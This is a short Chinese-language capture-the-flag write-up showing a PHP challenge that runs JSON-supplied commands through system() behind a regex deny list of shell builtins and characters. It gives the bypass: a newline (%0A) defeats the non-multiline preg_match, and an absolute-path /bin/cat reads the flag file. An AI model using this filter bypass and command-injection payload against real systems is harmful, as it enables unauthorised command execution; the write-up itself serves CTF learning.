首先以题为例
进来后是这个界面
题目告诉我们用json格式所以我们输入{"cmd":"ls"}查看有啥文件
发现有index.php这个文件里面有源码,这个题目一开始是就给了源码
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
对源码进行分析发现他用preg_match对一些命令函数进行了过滤,过滤的函数还挺多。但是preg_match只能匹配第一行的数据,并且.无法与换行进行匹配,所以我们这里考虑用换行进行绕过换行符%0A。?cmd={%0A"cmd":%20"ls%20/home/rceservice"%0A}看看这个目录下有什么
发现flag在这个目录下
由于前面putenv('PATH=/home/rceservice/jail');所以我们不能用相对路径,必须用绝对路径
?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}
最后读取成功